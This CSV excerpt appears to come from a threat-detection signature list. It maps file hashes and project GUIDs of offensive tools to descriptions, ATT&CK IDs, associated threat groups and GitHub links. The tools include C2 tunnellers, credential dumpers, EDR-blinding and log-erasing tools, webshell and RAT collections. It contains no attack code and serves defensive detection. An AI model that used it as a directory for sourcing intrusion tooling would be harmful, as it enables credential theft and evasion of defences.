"*09aa42564f461b40c5d610872ad6939f8dc31f9bc88be7b9604845fb61be5176*",".{0,1000}09aa42564f461b40c5d610872ad6939f8dc31f9bc88be7b9604845fb61be5176.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","21359"
"*09aa42564f461b40c5d610872ad6939f8dc31f9bc88be7b9604845fb61be5176*",".{0,1000}09aa42564f461b40c5d610872ad6939f8dc31f9bc88be7b9604845fb61be5176.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","21360"
"*09b0fe289efa8c6364964bddedb339a7d43b0eaae912ef4c3f357325c6c55b61*",".{0,1000}09b0fe289efa8c6364964bddedb339a7d43b0eaae912ef4c3f357325c6c55b61.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","21361"
"*09b3f22e8ad0fe1b6c07c202f07816fe3d4014835f3311620ca3b0bd5f710fe7*",".{0,1000}09b3f22e8ad0fe1b6c07c202f07816fe3d4014835f3311620ca3b0bd5f710fe7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21362"
"*09bbcb9f2fd54e7a14b71beebb6a69127a422c17a43838a0e1bfcba45813620e*",".{0,1000}09bbcb9f2fd54e7a14b71beebb6a69127a422c17a43838a0e1bfcba45813620e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21364"
"*09c297ffdf475a85c46c9332884fc3343d2512318f9be43b21bf45f522d12956*",".{0,1000}09c297ffdf475a85c46c9332884fc3343d2512318f9be43b21bf45f522d12956.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21365"
"*09d13749a026c345f3f75549abbdc3b082fdb3e51f43bd62bbc0cd2dfeb51e62*",".{0,1000}09d13749a026c345f3f75549abbdc3b082fdb3e51f43bd62bbc0cd2dfeb51e62.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21369"
"*09d3cc04fe795a9883abe23bee0ba2b011a4ed759e09dffd811f157233688be4*",".{0,1000}09d3cc04fe795a9883abe23bee0ba2b011a4ed759e09dffd811f157233688be4.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21370"
"*09d9169b42e10b354ce44c9bdb8f06c52506f14f39f6378e52b3c2eac1d27866*",".{0,1000}09d9169b42e10b354ce44c9bdb8f06c52506f14f39f6378e52b3c2eac1d27866.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21371"
"*09e0c32321b7bc4b6d95f4a36d9030ce2333d67ffff15e4ff51631c3c4aa319d*",".{0,1000}09e0c32321b7bc4b6d95f4a36d9030ce2333d67ffff15e4ff51631c3c4aa319d.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","#filehash","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","21373"
"*09e9ba137516adc361f33e2131db31841edb2f83c133a4e2790878997344e4ba*",".{0,1000}09e9ba137516adc361f33e2131db31841edb2f83c133a4e2790878997344e4ba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21375"
"*09e9c1c8da3f14a7910538675ac43764e07fc91c15df116519059a1af942d902*",".{0,1000}09e9c1c8da3f14a7910538675ac43764e07fc91c15df116519059a1af942d902.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21376"
"*09ec07ace796cf563fbad7a25a4749002ec748720e6d1bcdcca989a68f4d4c3c*",".{0,1000}09ec07ace796cf563fbad7a25a4749002ec748720e6d1bcdcca989a68f4d4c3c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21377"
"*09efed04888379b1fa6378ec5c4a944626129d92793a132ff56ab5d11fe53714*",".{0,1000}09efed04888379b1fa6378ec5c4a944626129d92793a132ff56ab5d11fe53714.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","21378"
"*09ffc42c2a49a422f8092f0cc5c899f92144e667376aa666c36799c70a2d491e*",".{0,1000}09ffc42c2a49a422f8092f0cc5c899f92144e667376aa666c36799c70a2d491e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21380"
"*0a070709fc2cac96d80f18a03eb7c539958c51e392475a0789aef50181707613*",".{0,1000}0a070709fc2cac96d80f18a03eb7c539958c51e392475a0789aef50181707613.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21381"
"*0a0be178cd014f569eac8697ce355c7ceb59b7e1a3aaa18673a7ffde4a044c88*",".{0,1000}0a0be178cd014f569eac8697ce355c7ceb59b7e1a3aaa18673a7ffde4a044c88.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","#filehash","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","21383"
"*0a0f2a82d5f3dbd8d9f8c6031b2ebb8c1820cf370e6b4fae2b1396cf2107dddd*",".{0,1000}0a0f2a82d5f3dbd8d9f8c6031b2ebb8c1820cf370e6b4fae2b1396cf2107dddd.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","#filehash","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","21384"
"*0a1253e1b523145145d03cdbee23afef894beb26fc0c9995588546bbd81d9a3e*",".{0,1000}0a1253e1b523145145d03cdbee23afef894beb26fc0c9995588546bbd81d9a3e.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21385"
"*0a140743a725d685faa98e11f0d34ab19c9531c50ac57c8b1ddbfa683057519d*",".{0,1000}0a140743a725d685faa98e11f0d34ab19c9531c50ac57c8b1ddbfa683057519d.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","21386"
"*0a1720f433f5e22118dea9126637364b222b25d812cbb3a9c35fcbc8561650db*",".{0,1000}0a1720f433f5e22118dea9126637364b222b25d812cbb3a9c35fcbc8561650db.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","21388"
"*0a1b6ab86651abe08734c0f185542c08ad8942e450b822a111553798f2f37302*",".{0,1000}0a1b6ab86651abe08734c0f185542c08ad8942e450b822a111553798f2f37302.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21389"
"*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*",".{0,1000}0A1C2C46\-33F7\-4D4C\-B8C6\-1FC9B116A6DF.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","0","#GUIDproject","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","21390"
"*0a1f9274ad63a72a443e82c19ab6c4e72c42eb4b399c3089b414abed4a9c4301*",".{0,1000}0a1f9274ad63a72a443e82c19ab6c4e72c42eb4b399c3089b414abed4a9c4301.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21391"
"*0a235cd4c61c042f550e1b348ed8f8ca3bd8254bb72213ecf7ec172eec7edba5*",".{0,1000}0a235cd4c61c042f550e1b348ed8f8ca3bd8254bb72213ecf7ec172eec7edba5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21392"
"*0A2B3F8A-EDC2-48B5-A5FC-DE2AC57C8990*",".{0,1000}0A2B3F8A\-EDC2\-48B5\-A5FC\-DE2AC57C8990.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#GUIDproject","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","21393"
"*0a2dbf9faa4445dfca15c92c6048cfca1e98ad9981f3c8349e7ffa34e62f638d*",".{0,1000}0a2dbf9faa4445dfca15c92c6048cfca1e98ad9981f3c8349e7ffa34e62f638d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21394"
"*0a33c2da28a068610b62a369635506fbd4a15233867c9c1e3041948006177cb6*",".{0,1000}0a33c2da28a068610b62a369635506fbd4a15233867c9c1e3041948006177cb6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21395"
"*0a3659cf00c99f85805b64bdbde13f3f3993163c0eaa5a6345e301c4331fb581*",".{0,1000}0a3659cf00c99f85805b64bdbde13f3f3993163c0eaa5a6345e301c4331fb581.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21397"
"*0a551dde187ba9984902de12b5de1d1d6ed17ba02eabeb9fa41ed2fe35d52faf*",".{0,1000}0a551dde187ba9984902de12b5de1d1d6ed17ba02eabeb9fa41ed2fe35d52faf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21401"
"*0a5e1abf70407a1de22cd14107dca8019bab45e8bfe4c45ca1e05e7e8bb92e89*",".{0,1000}0a5e1abf70407a1de22cd14107dca8019bab45e8bfe4c45ca1e05e7e8bb92e89.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21402"
"*0a6347197e46688711834531a7f75308298a9aa543c889a61260138d73e96634*",".{0,1000}0a6347197e46688711834531a7f75308298a9aa543c889a61260138d73e96634.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21403"
"*0a65867b6b4cb21b8a6bbaf06b355a36283b30840e02706bfd740c9da9f4197b*",".{0,1000}0a65867b6b4cb21b8a6bbaf06b355a36283b30840e02706bfd740c9da9f4197b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21404"
"*0a660e5933bd61f6a564cc86bc9ac4a573e104de8de35575a4a09d61357958b0*",".{0,1000}0a660e5933bd61f6a564cc86bc9ac4a573e104de8de35575a4a09d61357958b0.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21405"
"*0a74fdd3e97e8a940712f5a9cf0052c773b49a39788f3611e73cf00076b608ea*",".{0,1000}0a74fdd3e97e8a940712f5a9cf0052c773b49a39788f3611e73cf00076b608ea.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21407"
"*0a78cc032cff5d0c355e26a8d64bbbcd8b27124a2e82a5db1208cc70430f85d9*",".{0,1000}0a78cc032cff5d0c355e26a8d64bbbcd8b27124a2e82a5db1208cc70430f85d9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21408"
"*0A78E156-D03F-4667-B70E-4E9B4AA1D491*",".{0,1000}0A78E156\-D03F\-4667\-B70E\-4E9B4AA1D491.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","21409"
"*0a7cf0b0d8f68eec8829dde1d90183087d641547a6c97de021db9a631da99857*",".{0,1000}0a7cf0b0d8f68eec8829dde1d90183087d641547a6c97de021db9a631da99857.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#filehash","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","21411"
"*0a7cf0b0d8f68eec8829dde1d90183087d641547a6c97de021db9a631da99857*",".{0,1000}0a7cf0b0d8f68eec8829dde1d90183087d641547a6c97de021db9a631da99857.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","21412"
"*0a98ba3860779e363cebbdc08b6adce4c82c11276e705ac53fbbc3fafd3f6b59*",".{0,1000}0a98ba3860779e363cebbdc08b6adce4c82c11276e705ac53fbbc3fafd3f6b59.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21416"
"*0a99e30e751c3a01ffe34efaa615c55a6cbbc42038f7004ac356dad5dbba1ada*",".{0,1000}0a99e30e751c3a01ffe34efaa615c55a6cbbc42038f7004ac356dad5dbba1ada.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21417"
"*0aa6a04c0e8bb0022ccbe0c6f2bf6bc1806c59ffffae3981ae083e49e78573b7*",".{0,1000}0aa6a04c0e8bb0022ccbe0c6f2bf6bc1806c59ffffae3981ae083e49e78573b7.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","21418"
"*0aa81384c29ae395069a9d6bf226f1345c7909cdc7181c2c4f1c9015268e940d*",".{0,1000}0aa81384c29ae395069a9d6bf226f1345c7909cdc7181c2c4f1c9015268e940d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","21419"
"*0aaf0c9b2f4f67ea3012cef59464ce4899556e29920bdbec219f469e1b8fe935*",".{0,1000}0aaf0c9b2f4f67ea3012cef59464ce4899556e29920bdbec219f469e1b8fe935.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21420"
"*0ab70dccb06b2a6c06c16dd3aeb00140c9eaf4bd178d4edfd3ed662af3fcba13*",".{0,1000}0ab70dccb06b2a6c06c16dd3aeb00140c9eaf4bd178d4edfd3ed662af3fcba13.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21421"
"*0ABB9F2A-6913-4174-9431-851F9D3E94B4*",".{0,1000}0ABB9F2A\-6913\-4174\-9431\-851F9D3E94B4.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","21422"
